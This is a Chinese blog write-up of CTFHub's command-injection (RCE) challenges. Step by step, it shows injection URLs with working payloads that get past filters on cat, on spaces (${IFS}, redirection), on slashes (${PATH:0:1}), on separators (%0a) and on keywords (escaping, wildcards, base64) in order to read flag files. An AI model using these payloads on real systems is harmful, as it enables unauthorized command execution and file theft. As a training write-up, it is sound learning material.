CTF刷题记录CTFHub-RCE-命令注入

最新推荐文章于 2024-10-13 21:25:56 发布
最新推荐文章于 2024-10-13 21:25:56 发布
阅读量4.5k 收藏 24
点赞数 9
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/118929528
版权
本文详细介绍了CTF比赛中遇到的各种命令注入问题及其解决方案,包括无过滤、过滤cat、过滤空格、过滤目录分隔符、过滤运算符及综合过滤情况下的命令执行技巧,如使用more、less等命令绕过过滤,以及利用通配符和重定向符读取文件内容。通过这些实例,展示了如何在不同限制下成功获取flag。
摘要由CSDN通过智能技术生成

**

CTFHub-RCE-命令注入

**

1.无任何的过滤

一、解题思路
通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。
在这里插入图片描述

因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令

http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls

在这里插入图片描述
通过执行ls命令可以看到,该目下的文件,这是linux环境下
在这里插入图片描述

如果是window环境下,使用命令dir查看目录文件
在这里插入图片描述
在这里插入图片描述
我们使用cat命令读取index.php文件
http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cat index.php

在这里插入图片描述
http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cat 137391798722228.php
那我们也读取137391798722228.php这个文件试试
在这里插入图片描述
查看页面源代码,可以得到flag
在这里插入图片描述
二、知识点:
1、每个命令之间用(分号)”;”隔开;
说明:各命令的执行结果,不会影响其他命令的。
意思是说每个命令都会执行,但不保证每个命令都执行成功。
2、每个命令之间用&&隔开
说明:若前面的命令执行成功,才会去执行后面的命令。这样的话,可以保证所有的命令执行完毕后,执行的过程都是成功的。
3、每个命令之间用||隔开
说明:||是或的意思,只有前面的命令执行失败后采取执行下一条命令,直到执行成功一条命令为止。
4、|是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。
5、&是后台任务符号。后台任务符号使shell在后台执行该任务,这样用户就可以立即得到一个提示符并继续其他工作。

**

2.过滤cat

**
一、解题思路
当cat被过滤后,可以使用一下命令进行读取文件的内容
(1)more:一页一页的显示的显示档案内容
(2)less:与more类似,但是比more更好的是,他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出tac是cat的反向显示
(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器,这个也可以查看
(9)vim:一种编辑器,这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体的内容

直接使用分号(;)代替回车,执行ls命令
在这里插入图片描述
可以看到flag_124552338228659.php文件,那么我们可以直接使用cat进行读取
在这里插入图片描述
可是回显的是cat被过滤了,那么使用less或more试试
在这里插入图片描述
在这里插入图片描述

查看页面源代码,可以得到flag
在这里插入图片描述

3.过滤空格

直接使用分号(;)代替回车,执行ls命令
在这里插入图片描述
可以看到flag_806737515962.php文件,那么我们可以直接使用cat进行读取
在这里插入图片描述
可是回显的是空格被过滤了,那么使用<或${IFS}试试
在这里插入图片描述
在这里插入图片描述

查看页面源代码,可以得到flag
在这里插入图片描述
当空格被过滤后,可以使用一下命令进行读取文件的内容
< <> >重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20

4.过滤目录分隔符

http://challenge-3ad858b96ca4705e.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls
在这里插入图片描述
我们可以看到,使用逗号分隔符(;)结束前面的命令,成功执行ls命令,发现文件夹flag_is_here,接下来我们使用cd命令,进入到文件夹呢,ls查看这个文件的内容
http://challenge-3ad858b96ca4705e.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cd flag_is_here;ls
在这里插入图片描述
发现该文件夹中有一个名为flag_252412887014927.php的文件
在这里插入图片描述
我直接使用cat f*读取文件,查看页面源代码,得到flag
在这里插入图片描述
方法二:

在linux的系统环境变量中${PATH:0:/}代替/
http://challenge-3ad858b96ca4705e.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls flag_is_here{PATH:0:1}

同样也可以,得到flag_is_here中的文件内容
在这里插入图片描述
在这里插入图片描述

http://challenge-3ad858b96ca4705e.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cat flag_is_here${PATH:0:1}flag_252412887014927.php

在这里插入图片描述
查看页面源代码得到flag
在这里插入图片描述

5.过滤运算符

直接上手,执行ls命令,发现成功执行
http://challenge-11a29f066be499e3.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls
在这里插入图片描述
接下来,直接使用cat读取文件
http://challenge-11a29f066be499e3.sandbox.ctfhub.com:10800/?ip=127.0.0.1;cat flag_7666637111301.php
在这里插入图片描述
查看页面源代码,得到flag
在这里插入图片描述
经过测试,过滤了管道符(|),直接使用逗号(;)分隔
在这里插入图片描述
方法二
http://challenge-11a29f066be499e3.sandbox.ctfhub.com:10800/?ip=127.0.0.1;base64 flag_7666637111301.php
使用base64加密这个文件
在这里插入图片描述

使用base64在线解密,得到flag

在这里插入图片描述

6.综合过滤练习

直接使用逗号分隔(;)进行分隔,执行ls命令,发现逗号(;)被过滤
http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls
在这里插入图片描述
命令分隔符的绕过姿势
;
%0a
%0d
&
那我们使用%0a试试,发现ls命令被成功执行
http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0als

在这里插入图片描述
发现一个名为flag_is_here的文件夹和index.php的文件,那么我们还是使用cd命令进入到文件夹下
http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd flag_is_here%0als
在这里插入图片描述
发现空格和flag被过滤,空格绕过前面已经讲述,这里就不在赘述,直接尝试${IFS}进行空格绕过,使用fla\g反斜杠转义flag

http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd${IFS}fla\g_is_here%0als

成功读取flag_is_here文件夹下的内容
在这里插入图片描述
接下来,直接使用cat读取flag_300121897522180.php文件里的内容

http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd${IFS}fla\g_is_here%0acat${IFS}fla\g_300121897522180.php

在这里插入图片描述
发现过滤了cat,前面也讲过cat的绕过姿势,这里不在赘述,直接尝试less

http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0acd${IFS}fla\g_is_here%0aless${IFS}fla\g_300121897522180.php

在这里插入图片描述
命令执行成功,查看页面源代码得到flag

在这里插入图片描述
方法二
使用通配符进行绕过

符号解释
*匹配任意长度任意字符
匹配任意单个字符
[list]匹配指定范围内(list)任意单个字符,也可以是单个字符组成的集合
[^list]匹配指定范围外的任意单个字符和字符集合
[!list]同[^list]
{str1,str2,…}匹配str1或者str2或者更多字符串,也可以是集合
http://challenge-32203cc1c6b08a7e.sandbox.ctfhub.com:10800?ip=127.0.0.1%0acd${IFS}f*%0aless${IFS}f*

在这里插入图片描述
查看页面源代码,也可以得到flag

在这里插入图片描述
如果不想查看页面源代码,也可以使用base64加密flag_318922667817912.php文件

http://challenge-32203cc1c6b08a7e.sandbox.ctfhub.com:10800?ip=127.0.0.1%0acd${IFS}f*%0abase64${IFS}f*

在这里插入图片描述
然后进行base64解密,即可得到flag
在这里插入图片描述

山川绿水
关注
专栏目录
CTF命令注入(Dina 1.0)
afei001
04-01 594
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
CTFHub-Web-RCE-eval执行题目解析
weixin_46168073的博客
11-15 1468
一、启动场景 点击web 点击RCE 点击eval执行。 开启题目,启动场景。注册会送1000个币,做一个题目消耗30,做完奖励100还是50,总之完全不用担心币的问题。 启动之后会出现一个链接,我们点击。 二、解题过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后点击添加。 可以看到我们添加数据成功。 双击进...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTFHUB命令注入漏洞全题题解+相关知识点
最新发布
2301_81133001的博客
10-13 603
windows系统管道符实例描述;A;B由A向B逐步执行A&B无论真假,A与B都执行,前后的语句均可执行,但是前面的语句如果执行结果为假(即执行失败),则仅输出后面语句的结果&&A&&BA为真时才执行B,否则只执行A,如果前面的语句为假,则直接报错,也不执行后面的语句A|B将A结果输出,做B的输入,执行B命令语句||A||BA命令语句执行失败,然后才执行B命令语句,否则执行A命令语句linux系统管道符实例描述;A;B;C按顺序执行A与B、CA&
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2485
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTF-命令注入
不知名白帽的博客
05-28 1162
CTF-命令注入,实验环境:(192.168.20.128),靶机(192.168.20.141)。通过信息探测,深入挖掘隐藏信息,获取账号和密码,用searchsploit搜寻漏洞,再用msfconsole进行监听,然后用base64绕过防火墙,生成sehll,上传shell,反弹shell...
CTFHUB-RCE-命令注入
u014794539的博客
07-10 1302
命令注入 无过滤 考点 属于是纯纯的命令注入 思路分析 构造playload 127.0.0.1|ls 发现一个数字串挺长的php 构造 127.0.0.1|cat 18930164348325.php 提交了[1]没有东西 可以构造 127.0.0.1|cat 18930164348325.php|base64 然后base64解码 或者不加base64 查看源码也能得到 playload: ctfhub{af6df24d6b085066d0dc46d3} 过滤cat 考点 过滤cat
ctfhub-命令注入
m0_62094846的博客
12-15 344
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
ctf-all-in-one
01-30
ctf-all-in-one
CTFHUB-web-RCE
ookami6497的博客
12-03 1560
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 525
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTF—Web—SQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctfhub 命令注入
a666666688的博客
08-05 601
因为过滤了分割符,所以flag_is_here文件夹下的文件不能直接读取。若要在表单提交处修改则需要注意,提交后删除url中的25后即可执行。如果包含了这些被禁止的字符,就将匹配结果存储在。如果不包含这些字符,就构建一个。参数,会进行进一步的正则表达式匹配检查。这段代码的主要目的是根据用户通过。函数执行,将结果存储在。注意本体在url上修改即可。参数执行相应的操作。
CTFHub | 命令注入
尼泊罗河伯的博客
06-14 1922
检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
ctfhub——命令注入
m0_75007575的博客
04-05 474
这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。既然不能使用目录分隔符,那我们就先进入目录再去查看文件。打开控制台发现代码里面出现了flag,即通过成功。运算符都被过滤掉了,我们也可以使用;回显空白,得到flag。回显空白,得到flag。
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9283
CTF-命令注入【超详细】
ctfhubRCE命令注入
weixin_43326436的博客
06-12 1944
一.实验环境ctfhub RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 LINUX系统的管道符: 1," ; ": 执行完前面的语句在执行后面的语句。 2.“ | “: 显示后面的语句的执行结果。 3.” || “:当前的语句执行出错时,
CTF---Web---SQL注入---05---MongoDB+宽字节注入
qq_22160557的博客
07-29 919
文章目录前言一、题目描述二、解题步骤1、分析传入参数2、判断注入方式3、宽字节注入三、总结 前言 题目分类: CTF—Web—SQL注入—05—MongoDB+宽字节注入 一、题目描述 题目:研究生的秘密 二、解题步骤 1、分析传入参数 Step1:http://192.168.87.173/index.php?title=Mysql%20%E6%95%99%E7%A8%8B ,查看源代码,,只有title的值等于页面的参数时,content才有内容 2、判断注入方式 Step2:当title=1时
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值